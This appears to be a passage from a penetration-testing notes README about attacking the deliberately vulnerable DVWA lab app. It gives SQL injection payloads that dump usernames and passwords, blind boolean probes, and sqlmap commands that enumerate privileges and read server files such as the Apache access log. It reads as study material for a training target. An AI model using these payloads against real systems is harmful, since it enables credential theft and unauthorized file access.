peterchain7/Web_application-assessment/README.md

                                ' union select (select group_concat(user," ",password," ",first_name," ",last_name SEPARATOR '\n')from dvwa.users),2-- -

+ ### Blind based sql injection

+Blind SQL Injections occur when the affected application:

+    1. Does NOT return any SQL error messages or output.

+     2. Does NOT output any data to the user.

+ Testing

+      1' union select 1,user() -- -
+ In Blind Boolean-Based SQL Injections, we can ask the database a series of true or false questions to extract information.
+ For instance, we can ask the question, is the first character of the server's hostname a?
+If this is true, the application will return the message User ID exists in the database..
+FIRST CHARACTER:

+    1' AND SUBSTRING(user(),1,1)='r' --
+SECOND CHARACTER:

+    1' AND SUBSTRING(user(),1,2)='ro' -- -

+  ### USing sql map more

+   1. check logged in user prevelege

+            sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=r97n54ijbn5m8ofn0ug04fk9d7;security=low" --keep-alive --threads 8 --risk 3 --level 5 --dbms=mysql --current-user --privileges

+2. Reading files from server if current user has read access permission

+          sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=r97n54ijbn5m8ofn0ug04fk9d7;security=low" --keep-alive --threads 8 --risk 3 --level 5 --dbms=mysql --current-user --batch --file-read "/var/log/apache2/access.log"

  ## 4. OS Command Injection

   Executing os specific commands